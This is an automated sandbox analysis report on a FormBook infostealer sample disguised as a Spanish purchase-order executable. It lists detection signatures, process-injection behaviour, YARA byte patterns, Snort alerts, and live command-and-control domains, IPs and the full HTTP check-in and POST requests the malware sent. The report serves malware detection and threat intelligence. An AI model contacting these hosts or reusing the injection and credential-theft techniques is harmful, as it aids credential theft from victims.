Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Requisito de pedido #23022300.exe

Overview

General Information

Sample Name:Requisito de pedido #23022300.exe
Analysis ID:814048
MD5:8a06791059a482faa0cf845d2b953351
SHA1:37a236b4bea30fd46aefed9f8095b8c7989f0243
SHA256:f9b608b8ea15f9e8148eaa73ea96e2eff983b808f9d0cb2f27d833ebebc165f8
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Requisito de pedido #23022300.exe (PID: 4952 cmdline: C:\Users\user\Desktop\Requisito de pedido #23022300.exe MD5: 8A06791059A482FAA0CF845D2B953351)
    • CasPol.exe (PID: 5284 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
      • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 676 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f0e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x182e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x180e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17b81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x181e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1835f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa9fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16dcc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de87:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ee3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.572229101.00000000050F0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.572229101.00000000050F0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f0e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x182e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.CasPol.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        1.2.CasPol.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbdb2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1926a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        1.2.CasPol.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19068:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18b04:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1916a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x192e2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xb97d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17d4f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1ee0a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fdbd:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.CasPol.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20e63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xcbb2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.481.17.29.14949697802031412 02/23/23-11:17:57.595597
          SID:2031412
          Source Port:49697
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4148.251.13.12649701802031449 02/23/23-11:18:23.247083
          SID:2031449
          Source Port:49701
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4148.251.13.12649701802031412 02/23/23-11:18:23.247083
          SID:2031412
          Source Port:49701
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.481.17.29.14949697802031453 02/23/23-11:17:57.595597
          SID:2031453
          Source Port:49697
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4148.251.13.12649701802031453 02/23/23-11:18:23.247083
          SID:2031453
          Source Port:49701
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.481.17.29.14949697802031449 02/23/23-11:17:57.595597
          SID:2031449
          Source Port:49697
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.48.8.8.860686532023883 02/23/23-11:18:43.574078
          SID:2023883
          Source Port:60686
          Destination Port:53
          Protocol:UDP
          Classtype:Potentially Bad Traffic

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: Requisito de pedido #23022300.exeReversingLabs: Detection: 15%
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.572229101.00000000050F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.572833067.0000000005230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.354239146.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.frogair.online/vqh7/?hTb82V=6yP+4zmmFGehQ93JjA+P25coRCWIpu4kk0hKva5GiC1xzxOLQ03YJLnHpsQLSqMsYpfBQcl74Zo/h4S4tn0LYPeQAzWlGbO7Jw==&ryQDc=vwyb4Avira URL Cloud: Label: malware
          Source: http://www.gachthe365.site/vqh7/Avira URL Cloud: Label: malware
          Source: http://www.treebarktees.com/vqh7/Avira URL Cloud: Label: malware
          Source: http://www.gachthe365.site/vqh7/?hTb82V=pVoWNihbCh2zr5CHItakBz03v8qzOfTDGJe3fnCW5FC8ht3krgFCJJZSjJ8fBA0610Gm6f/qx36kmOqdgM55XwJzMQ03RKSfMg==&ryQDc=vwyb4Avira URL Cloud: Label: malware
          Source: http://www.awc.icu/vqh7/Avira URL Cloud: Label: malware
          Source: http://www.specigain.online/vqh7/Avira URL Cloud: Label: malware
          Source: http://www.frogair.onlineAvira URL Cloud: Label: malware
          Source: http://www.hotelyeah.top/vqh7/?hTb82V=7D8/lBzEw/wsNost5L+U4EiZQqgBuaFyWQoeh5HgHjAV29hA+52JaGKa2IA6i84+uhqZsECRoLQWyY+/mGhgcRLjHL7QON+iJA==&ryQDc=vwyb4Avira URL Cloud: Label: malware
          Source: http://www.krankenzusatz.net/vqh7/?hTb82V=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6ew4EgbD4Si63saT16r7LNb7qf0+W+lWgCrE9G0jw==&ryQDc=vwyb4Avira URL Cloud: Label: malware
          Source: http://www.specigain.online/vqh7/?hTb82V=t1pNaIlB57t+2Br13rtd5l5qJnwIoRZHcaYdKNODTQQHpRjo5OTeCknNVcCO080ObvYdOnMGhI5gsKQpTmmnmpY5IvhiyUBgJg==&ryQDc=vwyb4Avira URL Cloud: Label: malware
          Source: http://www.nativealternatives.com/vqh7/Avira URL Cloud: Label: malware
          Source: http://www.frogair.online/vqh7/7Avira URL Cloud: Label: malware
          Source: http://www.awc.icuAvira URL Cloud: Label: malware
          Source: http://www.gachthe365.siteAvira URL Cloud: Label: malware
          Source: http://www.krankenzusatz.net/vqh7/Avira URL Cloud: Label: malware
          Source: http://www.frogair.online/vqh7/Avira URL Cloud: Label: malware
          Source: http://www.hotelyeah.top/vqh7/Avira URL Cloud: Label: malware
          Source: http://www.hotelyeah.top/vqh7/K6jNAvira URL Cloud: Label: malware
          Source: http://www.nativealternatives.com/vqh7/?hTb82V=Wal8eNVZj43YUX59PSGdwan825+QwmNgiW2tgvg58tiLWmT3NKzwSJHVqQ8whildXtpelu1/jOeS1tuPF4RPzbvyn9a9+nnCWg==&ryQDc=vwyb4Avira URL Cloud: Label: malware
          Source: http://www.awc.icu/vqh7/oAvira URL Cloud: Label: malware
          Machine Learning detection for sample
          Source: Requisito de pedido #23022300.exeJoe Sandbox ML: detected
          Source: 1.2.CasPol.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Requisito de pedido #23022300.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: FUCKYOU.pdb source: Requisito de pedido #23022300.exe, 00000000.00000002.317344823.0000019FB1E10000.00000004.08000000.00040000.00000000.sdmp, Requisito de pedido #23022300.exe, 00000000.00000002.317547747.0000019FB382D000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: chkdsk.pdbGCTL source: CasPol.exe, 00000001.00000002.354323730.0000000001360000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: NMNhH726.pdb source: Requisito de pedido #23022300.exe
          Source: Binary string: chkdsk.pdb source: CasPol.exe, 00000001.00000002.354323730.0000000001360000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: caspol.pdbdv source: chkdsk.exe, 00000003.00000002.572301991.0000000005144000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000003.00000002.574754750.00000000058B3000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: CasPol.exe, 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000001.00000003.318099697.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000003.00000002.573083356.000000000568F000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000003.00000002.573083356.0000000005570000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000003.00000003.356143931.00000000053DD000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000003.00000003.354326801.0000000005234000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: FUCKYOU.pdbx_ source: Requisito de pedido #23022300.exe, 00000000.00000002.317344823.0000019FB1E10000.00000004.08000000.00040000.00000000.sdmp, Requisito de pedido #23022300.exe, 00000000.00000002.317547747.0000019FB382D000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: caspol.pdb source: chkdsk.exe, 00000003.00000002.572301991.0000000005144000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000003.00000002.574754750.00000000058B3000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: CasPol.exe, CasPol.exe, 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000001.00000003.318099697.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000003.00000002.573083356.000000000568F000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000003.00000002.573083356.0000000005570000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000003.00000003.356143931.00000000053DD000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000003.00000003.354326801.0000000005234000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B331F0 FindFirstFileW,FindNextFileW,FindClose,3_2_00B331F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B331E9 FindFirstFileW,FindNextFileW,FindClose,3_2_00B331E9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi3_2_00B28D70
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi3_2_00B24DB1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi3_2_00B28D6F

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 148.251.13.126 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.158 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.treebarktees.com
          Source: C:\Windows\explorer.exeDomain query: www.heroclassicrally.co.uk
          Source: C:\Windows\explorer.exeDomain query: www.hotelyeah.top
          Source: C:\Windows\explorer.exeDomain query: www.jewelryimpact.com
          Source: C:\Windows\explorer.exeDomain query: www.frogair.online
          Source: C:\Windows\explorer.exeDomain query: www.krankenzusatz.net
          Source: C:\Windows\explorer.exeDomain query: www.specigain.online
          Source: C:\Windows\explorer.exeNetwork Connect: 199.192.22.198 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.117 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.72 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 185.53.177.54 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tobinrasheedja.cyou
          Source: C:\Windows\explorer.exeDomain query: www.gachthe365.site
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.29.148 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.nativealternatives.com
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.29.149 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 75.102.22.168 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.verde-amar.info
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 81.17.29.149:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 81.17.29.149:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 81.17.29.149:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49701 -> 148.251.13.126:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49701 -> 148.251.13.126:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49701 -> 148.251.13.126:80
          Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.4:60686 -> 8.8.8.8:53
          Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
          Source: global trafficHTTP traffic detected: GET /vqh7/?hTb82V=c3T4NncdiggRvhiDkOPUV54pY2f+jJK99/S+uCks/lUPYoCt0sy68wjf82DqpFtmKPoTAmkWX3bWObR3jmvMIkerc/mY+VSrAA==&ryQDc=vwyb4 HTTP/1.1Host: www.verde-amar.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?hTb82V=z6WFz1ekjtuVhInuStcoC2ViyZsFVb4/WAP1IcCYAcw2um1tEg7dOsgaRrguIqza4tr80FhnA0YyZCpgAYYfeED05Aw0pMEaxg==&ryQDc=vwyb4 HTTP/1.1Host: www.jewelryimpact.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?hTb82V=t1pNaIlB57t+2Br13rtd5l5qJnwIoRZHcaYdKNODTQQHpRjo5OTeCknNVcCO080ObvYdOnMGhI5gsKQpTmmnmpY5IvhiyUBgJg==&ryQDc=vwyb4 HTTP/1.1Host: www.specigain.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?hTb82V=pVoWNihbCh2zr5CHItakBz03v8qzOfTDGJe3fnCW5FC8ht3krgFCJJZSjJ8fBA0610Gm6f/qx36kmOqdgM55XwJzMQ03RKSfMg==&ryQDc=vwyb4 HTTP/1.1Host: www.gachthe365.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?hTb82V=6yP+4zmmFGehQ93JjA+P25coRCWIpu4kk0hKva5GiC1xzxOLQ03YJLnHpsQLSqMsYpfBQcl74Zo/h4S4tn0LYPeQAzWlGbO7Jw==&ryQDc=vwyb4 HTTP/1.1Host: www.frogair.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?hTb82V=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6ew4EgbD4Si63saT16r7LNb7qf0+W+lWgCrE9G0jw==&ryQDc=vwyb4 HTTP/1.1Host: www.krankenzusatz.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?hTb82V=7D8/lBzEw/wsNost5L+U4EiZQqgBuaFyWQoeh5HgHjAV29hA+52JaGKa2IA6i84+uhqZsECRoLQWyY+/mGhgcRLjHL7QON+iJA==&ryQDc=vwyb4 HTTP/1.1Host: www.hotelyeah.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?hTb82V=Wal8eNVZj43YUX59PSGdwan825+QwmNgiW2tgvg58tiLWmT3NKzwSJHVqQ8whildXtpelu1/jOeS1tuPF4RPzbvyn9a9+nnCWg==&ryQDc=vwyb4 HTTP/1.1Host: www.nativealternatives.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?hTb82V=lfF/IMXZC9z0Y8i3jJMV2iASSilbfJLlfXmtIcwvtHqqMqJ7XpqTWvQhSof1n765ctlTYzJmnMi2PgJXJ8R+QD+1thlnm9XNRA==&ryQDc=vwyb4 HTTP/1.1Host: www.heroclassicrally.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.192.22.198 199.192.22.198
          Source: global trafficHTTP traffic detected: POST /vqh7/ HTTP/1.1Host: www.jewelryimpact.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.jewelryimpact.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jewelryimpact.com/vqh7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 68 54 62 38 32 56 3d 7e 34 7e 6c 77 41 61 58 79 38 76 75 72 73 7a 39 59 76 45 63 59 79 39 79 28 4b 39 6b 41 4a 42 65 50 48 58 70 4b 59 53 4d 43 49 63 69 75 67 63 55 47 78 47 4f 4b 50 67 63 55 4f 6f 63 43 4a 69 6d 79 74 71 62 33 31 42 69 4a 6d 52 6c 64 79 63 6d 63 39 6f 58 66 57 6a 4a 38 79 38 59 71 50 51 4b 7e 73 6f 5a 64 48 55 4c 73 52 67 6f 6b 72 70 53 50 4d 4b 69 28 4b 69 54 53 66 76 4a 53 49 77 45 6f 79 79 70 74 75 53 7a 49 30 35 45 46 42 48 6e 45 5a 4a 42 55 6d 4f 73 77 67 6a 47 36 6d 6b 54 33 36 5a 78 4b 72 4a 64 63 6b 47 6a 6c 37 51 66 43 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: hTb82V=~4~lwAaXy8vursz9YvEcYy9y(K9kAJBePHXpKYSMCIciugcUGxGOKPgcUOocCJimytqb31BiJmRldycmc9oXfWjJ8y8YqPQK~soZdHULsRgokrpSPMKi(KiTSfvJSIwEoyyptuSzI05EFBHnEZJBUmOswgjG6mkT36ZxKrJdckGjl7QfCg).
          Source: global trafficHTTP traffic detected: POST /vqh7/ HTTP/1.1Host: www.specigain.onlineConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.specigain.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.specigain.online/vqh7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 68 54 62 38 32 56 3d 67 33 42 74 5a 34 56 76 30 4a 31 36 31 79 6e 48 73 72 56 6f 32 46 4e 78 4a 55 30 4a 7e 67 30 4c 4e 6f 67 6a 4b 4b 79 7a 47 33 6f 71 35 42 53 47 34 39 75 69 4c 6e 7e 50 45 63 79 68 7a 38 63 4d 52 38 6c 6f 44 41 45 6a 77 71 30 4e 71 36 77 72 4f 45 65 44 73 62 49 4f 4e 4a 78 6c 77 30 56 4b 4f 71 51 5f 4e 41 33 30 50 54 78 73 54 54 46 4e 79 53 48 7a 51 51 64 5f 68 4a 56 5f 65 63 50 31 47 56 65 63 77 35 47 6d 61 70 37 5f 65 56 63 74 49 58 34 4f 70 30 6f 49 71 6a 39 61 64 62 71 6b 56 48 78 75 6b 38 51 47 41 73 69 6c 69 71 47 71 58 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: hTb82V=g3BtZ4Vv0J161ynHsrVo2FNxJU0J~g0LNogjKKyzG3oq5BSG49uiLn~PEcyhz8cMR8loDAEjwq0Nq6wrOEeDsbIONJxlw0VKOqQ_NA30PTxsTTFNySHzQQd_hJV_ecP1GVecw5Gmap7_eVctIX4Op0oIqj9adbqkVHxuk8QGAsiliqGqXg).
          Source: global trafficHTTP traffic detected: POST /vqh7/ HTTP/1.1Host: www.gachthe365.siteConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.gachthe365.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gachthe365.site/vqh7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 68 54 62 38 32 56 3d 6b 58 41 32 4f 57 78 66 50 69 61 69 6b 4b 65 5a 49 5f 79 44 44 47 34 53 36 70 4c 49 62 4d 43 75 63 61 75 53 49 44 65 5f 39 77 32 78 6e 65 48 69 74 78 55 34 4d 4c 4e 33 6d 73 74 52 41 77 70 49 35 6c 54 50 30 39 44 76 77 68 6e 79 74 70 48 44 6a 38 31 39 5a 78 74 75 4a 78 42 4b 55 37 75 38 45 44 38 34 62 50 51 5a 4a 6c 4c 77 43 56 68 58 33 43 5a 6a 77 75 67 54 6e 70 54 6c 69 55 4f 63 6b 50 6c 6b 4b 66 73 79 42 35 56 68 70 47 73 61 7a 31 78 54 6b 61 28 62 48 65 4b 46 38 36 38 78 4a 57 65 45 50 4a 6e 2d 65 53 73 70 66 49 33 43 31 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: hTb82V=kXA2OWxfPiaikKeZI_yDDG4S6pLIbMCucauSIDe_9w2xneHitxU4MLN3mstRAwpI5lTP09DvwhnytpHDj819ZxtuJxBKU7u8ED84bPQZJlLwCVhX3CZjwugTnpTliUOckPlkKfsyB5VhpGsaz1xTka(bHeKF868xJWeEPJn-eSspfI3C1g).
          Source: global trafficHTTP traffic detected: POST /vqh7/ HTTP/1.1Host: www.frogair.onlineConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.frogair.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frogair.online/vqh7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 68 54 62 38 32 56 3d 33 77 6e 65 37 48 65 4e 44 33 4c 43 62 2d 76 55 6a 41 71 42 77 72 6f 52 59 54 37 41 6b 2d 52 44 78 54 6c 64 73 38 6b 55 76 56 4e 54 71 58 6e 5a 64 6d 44 59 53 75 6e 48 67 38 73 52 52 4a 42 56 58 6f 61 46 47 2d 39 71 39 72 74 70 71 34 7a 31 39 69 34 35 41 5f 7e 74 48 51 53 6a 45 62 4f 33 49 62 6a 54 62 39 53 4d 4f 56 7e 7a 46 77 77 46 73 74 34 30 43 4a 59 71 30 53 37 79 56 6c 5a 55 66 74 62 6b 73 5a 47 4c 6b 64 45 64 62 58 55 55 78 65 79 68 7a 7a 43 31 6c 69 62 33 56 6e 62 78 53 41 48 65 37 46 6a 36 71 69 77 51 57 68 6e 5f 64 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: hTb82V=3wne7HeND3LCb-vUjAqBwroRYT7Ak-RDxTlds8kUvVNTqXnZdmDYSunHg8sRRJBVXoaFG-9q9rtpq4z19i45A_~tHQSjEbO3IbjTb9SMOV~zFwwFst40CJYq0S7yVlZUftbksZGLkdEdbXUUxeyhzzC1lib3VnbxSAHe7Fj6qiwQWhn_dg).
